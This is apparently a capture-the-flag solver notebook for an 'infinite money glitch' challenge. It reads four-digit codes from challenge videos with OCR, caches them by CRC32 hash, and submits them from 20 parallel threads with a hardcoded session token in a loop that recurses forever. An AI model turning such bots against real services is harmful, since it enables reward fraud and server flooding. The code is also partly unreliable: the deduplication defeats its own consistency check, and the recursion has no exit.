In [ ]:
pip install opencv-python-headless numpy easyocr requests beautifulsoup4 retrying

In [ ]:
import json

codes_dict = {"18224D2B": "3223", "A40966D8": "3580", "29987A6B": "7562", "72F0CB40": "3548", "0199FB8D": "1041", "13391413": "3148", "C0244331": "6813", "2364EA78": "8211", "7DA78989": "1121", "8622A242": "4774", "6D0C260A": "6581", "435EEF1F": "5563", "6D71BBEE": "5624", "A2D0DD24": "4403", "9961284B": "8318", "AA689BFB": "8538", "62FAC77B": "2417", "707F01C0": "1325", "90AC520F": "8606", "AA43EFE7": "7510", "507DEEAB": "1382", "82DE810E": "5622", "CF946F7C": "8630", "46532AC7": "4106", "163277C1": "4521", "858B0342": "5634", "A97DB195": "7514", "9D0907FD": "5537", "96BB46D3": "8313", "FC862EC4": "1618", "A2B4BB64": "5376", "A615AD77": "5756", "C234B767": "3632", "3A6D1273": "1285", "359B53B6": "4075", "82A7FDE8": "4140", "FF7AF3F5": "6152", "7F54EE43": "7777", "5F750703": "4025", "8C83C058": "4514", "C6C90684": "4175", "CAEBC945": "4015", "B16E5D29": "7886"}
with open('codes.json', 'w') as json_file:
  json.dump(codes_dict, json_file)

In [ ]:
import easyocr

reader = easyocr.Reader(['en'], gpu=True, verbose=False)

In [ ]:
import concurrent.futures
import cv2
import re
import json
import binascii
from collections import Counter
import requests
from bs4 import BeautifulSoup
import os
from retrying import retry
import time

def retry_on_error(exception):
    return isinstance(exception, requests.exceptions.RequestException)

token = "e7631603-ea51-43a1-b474-47ca6078d111"

def calculate_crc32_from_content(content):
    if content:
        crc32 = binascii.crc32(content) & 0xFFFFFFFF
        return "%08X" % crc32
    else:
        return None

def iter_frames(cap):
    while True:
        ret, frame = cap.read()
        if not ret:
            break
        yield frame

def save_video_temporarily(video_content, temp_path):
    with open(temp_path, 'wb') as temp_file:
        temp_file.write(video_content)

def delete_temp_video(temp_path):
    os.remove(temp_path)

def extract_unique_code_from_video(video_content, crc32, video_uuid, frame_interval):
    video_name = f"{video_uuid}.mp4"

    save_video_temporarily(video_content, video_name)

    cap = cv2.VideoCapture(video_name)
    codes_list = []

    codes_dict = {}

    try:
        with open('codes.json', 'r') as json_file:
            codes_dict = json.load(json_file)

            if crc32 in codes_dict:
                return codes_dict[crc32]

    except FileNotFoundError:
        pass

    for frame_number, frame in enumerate(iter_frames(cap), start=1):
        if frame_number % frame_interval == 0:
            gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

            results = reader.readtext(gray_frame)

            for detection in results:
                text = detection[1]
                match = re.search(r'\b(\d{4})\b', text)
                if match:
                    four_digit_code = match.group(1)
                    codes_list.append(four_digit_code)

    cap.release()

    delete_temp_video(video_name)

    codes_list = list(set(codes_list))

    if len(codes_list) == 0:
        return None

    codes_counter = Counter(codes_list)
    most_common_code, occurrences = codes_counter.most_common(1)[0]

    if occurrences == 1:
        codes_dict[crc32] = most_common_code
        with open('codes.json', 'w') as json_file:
            json.dump(codes_dict, json_file)

        return most_common_code
    else:
        return "Les codes extraits ne sont pas identiques."

@retry(retry_on_exception=retry_on_error, wait_fixed=2000, stop_max_delay=60000)
def send_validation_request(uuid, code):
    url = "https://infinitemoneyglitch.chall.malicecyber.com/validate"
    data = {"uuid": uuid, "code": code}
    headers = {'Content-Type': 'application/json', 'Cookie': f'token={token}'}

    response = requests.post(url, data=json.dumps(data), headers=headers)
    response.raise_for_status()

    if response.status_code == 400 and "Too Early" in response.text:
        print("Received 'Too Early' response. Retrying...")
        raise requests.exceptions.RequestException("Too Early")

    return response.json()

def download_video_content(video_link):
    try:
        headers = {'Cookie': f'token={token}'}
        response = requests.get(video_link, headers=headers)
        response.raise_for_status()
        return response.content
    except requests.exceptions.RequestException as e:
        print(f"Erreur lors du téléchargement de la vidéo : {e}")
        return None

def get_video_link(url, token):
    headers = {'Cookie': f'token={token}'}
    response = requests.get(url, headers=headers)
    soup = BeautifulSoup(response.text, 'html.parser')
    source_tag = soup.find('source', type='video/mp4')
    if source_tag:
        video_link = "https://infinitemoneyglitch.chall.malicecyber.com" + source_tag.get('src')
        return video_link
    else:
        return None

def extract_code_from_crc32(crc32):
    try:
        with open('codes.json', 'r') as json_file:
            codes_dict = json.load(json_file)
            if crc32 in codes_dict:
                return codes_dict[crc32]
    except FileNotFoundError:
        pass
    return None

def extract_video_uuid(video_link):
    uuid_pattern = re.compile(r'/stream/([a-f0-9-]+)')
    match = uuid_pattern.search(video_link)
    if match:
        return match.group(1)
    else:
        return None

def process_video(video_link):
    video_uuid = extract_video_uuid(video_link)

    if video_uuid:
        video_content = download_video_content(video_link)
        crccheck = calculate_crc32_from_content(video_content)

        if crccheck:
            code_from_crc = extract_code_from_crc32(crccheck)
            if code_from_crc:
                print(f"Code extrait du fichier codes.json : {code_from_crc}")
                validation_result = send_validation_request(video_uuid, code_from_crc)
                print(f"Résultat de la validation : {validation_result}")
            else:
                result = extract_unique_code_from_video(video_content, crccheck, video_uuid, frame_interval=50)
                if result is not None:
                  print(result)
                  validation_result = send_validation_request(video_uuid, result)
                  print(f"Résultat de la validation : {validation_result}")
        else:
            print("Échec du calcul du CRC32.")
    else:
        print("Impossible d'extraire l'UUID de la vidéo depuis le lien vidéo.")

video_page_url = "https://infinitemoneyglitch.chall.malicecyber.com/video"

def loopGain():
  worker_num = 20

  video_links = [get_video_link(video_page_url, token) for _ in range(worker_num)]

  with concurrent.futures.ThreadPoolExecutor(max_workers=worker_num) as executor:
      executor.map(process_video, video_links)
  loopGain()

loopGain()